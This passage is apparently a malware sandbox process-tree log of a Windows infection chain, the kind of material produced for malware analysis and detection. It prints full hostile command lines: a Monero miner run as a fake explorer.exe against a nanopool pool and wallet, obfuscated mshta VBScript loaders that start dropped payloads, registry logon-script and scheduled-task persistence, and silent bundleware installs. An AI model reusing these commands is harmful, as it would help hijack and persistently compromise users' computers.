                                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                        9⤵
                                                                                          PID:7080
                                                                                    • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1416
                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                        C:\Windows\system32\WerFault.exe -u -p 1416 -s 1964
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:5616
                                                                                    • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4140
                                                                                    • C:\Users\Admin\AppData\Local\Temp\3.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\3.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4212
                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                        C:\Windows\system32\WerFault.exe -u -p 4212 -s 1676
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:5472
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4492
                                                                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4372
                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                        C:\Windows\system32\WerFault.exe -u -p 4372 -s 1700
                                                                                        8⤵
                                                                                        • Program crash
                                                                                        PID:5516
                                                                                    • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4728
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\7.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4840
                                                                                    • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5004
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe
                                                                                  5⤵
                                                                                    PID:4060
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri1921f7a9d3.exe
                                                                                      Fri1921f7a9d3.exe
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2680
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone
                                                                                    5⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3980
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe
                                                                                    5⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3824
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                            1⤵
                                                                              PID:2720
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                              1⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:2712
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Checks processor information in registry
                                                                                • Modifies data under HKEY_USERS
                                                                                • Modifies registry class
                                                                                PID:4388
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                              1⤵
                                                                                PID:2420
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                1⤵
                                                                                  PID:2400
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:1868
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri195cd4dbfdf37897.exe
                                                                                    Fri195cd4dbfdf37897.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1836
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-HD2P9.tmp\Fri195cd4dbfdf37897.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-HD2P9.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$6005E,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS0744FE84\Fri195cd4dbfdf37897.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:2512
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-LI6QN.tmp\Setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-LI6QN.tmp\Setup.exe" /Verysilent
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks computer location settings
                                                                                        • Drops file in Program Files directory
                                                                                        PID:3768
                                                                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                                                                          "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks computer location settings
                                                                                          PID:5704
                                                                                          • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3036
                                                                                            • C:\ProgramData\2367215.exe
                                                                                              "C:\ProgramData\2367215.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4844
                                                                                            • C:\ProgramData\5065377.exe
                                                                                              "C:\ProgramData\5065377.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                              PID:5672
                                                                                            • C:\ProgramData\8200663.exe
                                                                                              "C:\ProgramData\8200663.exe"
                                                                                              6⤵
                                                                                                PID:5900
                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                  "C:\Windows\System32\mshta.exe" VbScRIpt: CLOSE (CrEATEoBJeCT( "wsCrIPt.SHell" ). rUn( "C:\Windows\system32\cmd.exe /Q /C TYPE ""C:\ProgramData\8200663.exe"" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if """" == """" for %D in ( ""C:\ProgramData\8200663.exe"" ) do taskkill /Im ""%~NxD"" /f " , 0 , TRuE) )
                                                                                                  7⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  PID:2880
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /Q /C TYPE "C:\ProgramData\8200663.exe" > uIA5.eXE && STaRt UiA5.eXe /P0NTOdcYDlh~kX43m7& if "" == "" for %D in ( "C:\ProgramData\8200663.exe" ) do taskkill /Im "%~NxD" /f
                                                                                                    8⤵
                                                                                                      PID:6440
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /Im "8200663.exe" /f
                                                                                                        9⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:6508
                                                                                                • C:\ProgramData\5192190.exe
                                                                                                  "C:\ProgramData\5192190.exe"
                                                                                                  6⤵
                                                                                                    PID:5368
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
                                                                                                  5⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:6256
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                                                                    6⤵
                                                                                                      PID:6432
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
                                                                                                    5⤵
                                                                                                      PID:5648
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
                                                                                                        6⤵
                                                                                                          PID:4924
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /im "foradvertising.exe" /f
                                                                                                            7⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:6168
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
                                                                                                        5⤵
                                                                                                        • Checks computer location settings
                                                                                                        PID:3768
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
                                                                                                          6⤵
                                                                                                            PID:5852
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                                                                                          5⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Enumerates connected drives
                                                                                                          PID:5804
                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/forcecleanup /wintime 1631101553 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                            6⤵
                                                                                                              PID:7060
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"
                                                                                                            5⤵
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:6748
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                            5⤵
                                                                                                              PID:6152
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-52AE0.tmp\IBInstaller_74449.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-52AE0.tmp\IBInstaller_74449.tmp" /SL5="$C03E6,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                6⤵
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:6996
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-U0LSR.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                  7⤵
                                                                                                                    PID:6084
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      8⤵
                                                                                                                        PID:3768
                                                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-U0LSR.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                        8⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        PID:6164
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                      7⤵
                                                                                                                        PID:3784
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                          8⤵
                                                                                                                            PID:7028
                                                                                                                        • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                          "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                          7⤵
                                                                                                                            PID:5076
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                            7⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            PID:5444
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-U0LSR.tmp\{app}\vdi_compiler.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-U0LSR.tmp\{app}\vdi_compiler"
                                                                                                                            7⤵
                                                                                                                              PID:6664
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-U0LSR.tmp\{app}\vdi_compiler.exe"
                                                                                                                                8⤵
                                                                                                                                  PID:4044
                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    ping localhost -n 4
                                                                                                                                    9⤵
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:1816
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vpn.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
                                                                                                                            5⤵
                                                                                                                              PID:5356
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-3B4DI.tmp\vpn.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-3B4DI.tmp\vpn.tmp" /SL5="$A01F2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
                                                                                                                                6⤵
                                                                                                                                  PID:6308
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                    7⤵
                                                                                                                                      PID:5808
                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                        tapinstall.exe remove tap0901
                                                                                                                                        8⤵
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        PID:4576
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                      7⤵
                                                                                                                                        PID:5816
                                                                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                          tapinstall.exe install OemVista.inf tap0901
                                                                                                                                          8⤵
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Modifies system certificate store
                                                                                                                                          PID:6100
                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                        7⤵
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:3192
                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                        7⤵
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:4976
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                    5⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    PID:7112
                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Weather Installation.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631101553 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                      6⤵
                                                                                                                                        PID:7032
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                      5⤵
                                                                                                                                        PID:7164
                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631101553 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                          6⤵
                                                                                                                                            PID:6500
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\askinstall45.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"
                                                                                                                                          5⤵
                                                                                                                                            PID:3768
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                              6⤵
                                                                                                                                                PID:7076
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                  7⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:808
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"
                                                                                                                                              5⤵
                                                                                                                                                PID:5224
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:6664
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"
                                                                                                                                                  5⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  PID:6344
                                                                                                                                                  • C:\Users\Admin\Documents\PzJ1_I4Qjwmzyw72_AYJ97zI.exe
                                                                                                                                                    "C:\Users\Admin\Documents\PzJ1_I4Qjwmzyw72_AYJ97zI.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    PID:64
                                                                                                                                                  • C:\Users\Admin\Documents\oD_pEPENXCQ9uSfsag2TxwQy.exe
                                                                                                                                                    "C:\Users\Admin\Documents\oD_pEPENXCQ9uSfsag2TxwQy.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:4856
                                                                                                                                                    • C:\Users\Admin\Documents\oD_pEPENXCQ9uSfsag2TxwQy.exe
                                                                                                                                                      C:\Users\Admin\Documents\oD_pEPENXCQ9uSfsag2TxwQy.exe
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5836
                                                                                                                                                      • C:\Users\Admin\Documents\oD_pEPENXCQ9uSfsag2TxwQy.exe
                                                                                                                                                        C:\Users\Admin\Documents\oD_pEPENXCQ9uSfsag2TxwQy.exe
                                                                                                                                                        7⤵
                                                                                                                                                          PID:4124
                                                                                                                                                      • C:\Users\Admin\Documents\k9xrWIzgSZP3S_dU97MkeHNG.exe
                                                                                                                                                        "C:\Users\Admin\Documents\k9xrWIzgSZP3S_dU97MkeHNG.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:5764
                                                                                                                                                        • C:\Users\Admin\Documents\_nnWv5tn8h5OYE4nZLWV0hH8.exe
                                                                                                                                                          "C:\Users\Admin\Documents\_nnWv5tn8h5OYE4nZLWV0hH8.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                          PID:6308
                                                                                                                                                        • C:\Users\Admin\Documents\O4Z1QL5pApiHpugo2hdfTgbT.exe
                                                                                                                                                          "C:\Users\Admin\Documents\O4Z1QL5pApiHpugo2hdfTgbT.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          PID:6780
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                            7⤵
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:4296
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                            7⤵
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:4592
                                                                                                                                                        • C:\Users\Admin\Documents\ZdIFDdyZY1QNEDXFiKqhyguP.exe
                                                                                                                                                          "C:\Users\Admin\Documents\ZdIFDdyZY1QNEDXFiKqhyguP.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:6444
                                                                                                                                                          • C:\Users\Admin\Documents\fbXq08gM1zGihoMX0rpAOL9P.exe
                                                                                                                                                            "C:\Users\Admin\Documents\fbXq08gM1zGihoMX0rpAOL9P.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            PID:7052
                                                                                                                                                            • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                              dllhost.exe
                                                                                                                                                              7⤵
                                                                                                                                                                PID:3700
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /c cmd < Nobile.docm
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:5692
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5324
                                                                                                                                                                • C:\Users\Admin\Documents\fwxbZYq22p4zORPOlsAYCYDf.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\fwxbZYq22p4zORPOlsAYCYDf.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  PID:6148
                                                                                                                                                                • C:\Users\Admin\Documents\q_VPyyM76ND57t5_11rTc5EG.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\q_VPyyM76ND57t5_11rTc5EG.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5828
                                                                                                                                                                  • C:\Users\Admin\Documents\LL3h8K9oUns0pEKr2CchExNG.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\LL3h8K9oUns0pEKr2CchExNG.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:1356
                                                                                                                                                                    • C:\Users\Admin\Documents\LL3h8K9oUns0pEKr2CchExNG.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\LL3h8K9oUns0pEKr2CchExNG.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:5596
                                                                                                                                                                      • C:\Users\Admin\Documents\LL3h8K9oUns0pEKr2CchExNG.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\LL3h8K9oUns0pEKr2CchExNG.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5812
                                                                                                                                                                        • C:\Users\Admin\Documents\LL3h8K9oUns0pEKr2CchExNG.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\LL3h8K9oUns0pEKr2CchExNG.exe"
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                          PID:7164
                                                                                                                                                                      • C:\Users\Admin\Documents\OV3MxNzWKKp8YniP3f3iK3rq.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\OV3MxNzWKKp8YniP3f3iK3rq.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6460
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6460 -s 660
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5172
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6460 -s 676
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:3280
                                                                                                                                                                        • C:\Users\Admin\Documents\I8LbNhicOAgldKwQek7EM2JP.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\I8LbNhicOAgldKwQek7EM2JP.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:2376
                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\I8LbNhicOAgldKwQek7EM2JP.exe"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """" == """" for %A IN ( ""C:\Users\Admin\Documents\I8LbNhicOAgldKwQek7EM2JP.exe"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:5612
                                                                                                                                                                            • C:\Users\Admin\Documents\fttXKI91zJf6YizCSrF2CXFb.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\fttXKI91zJf6YizCSrF2CXFb.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:6700
                                                                                                                                                                              • C:\Users\Admin\Documents\YCt5wKpXpT1TthOULZc49b0N.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\YCt5wKpXpT1TthOULZc49b0N.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6728
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{8B8EBD8B-C397-4A53-88AA-93D13AC13E55}\YCt5wKpXpT1TthOULZc49b0N.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\{8B8EBD8B-C397-4A53-88AA-93D13AC13E55}\YCt5wKpXpT1TthOULZc49b0N.exe /q"C:\Users\Admin\Documents\YCt5wKpXpT1TthOULZc49b0N.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{8B8EBD8B-C397-4A53-88AA-93D13AC13E55}" /IS_temp
                                                                                                                                                                                    7⤵
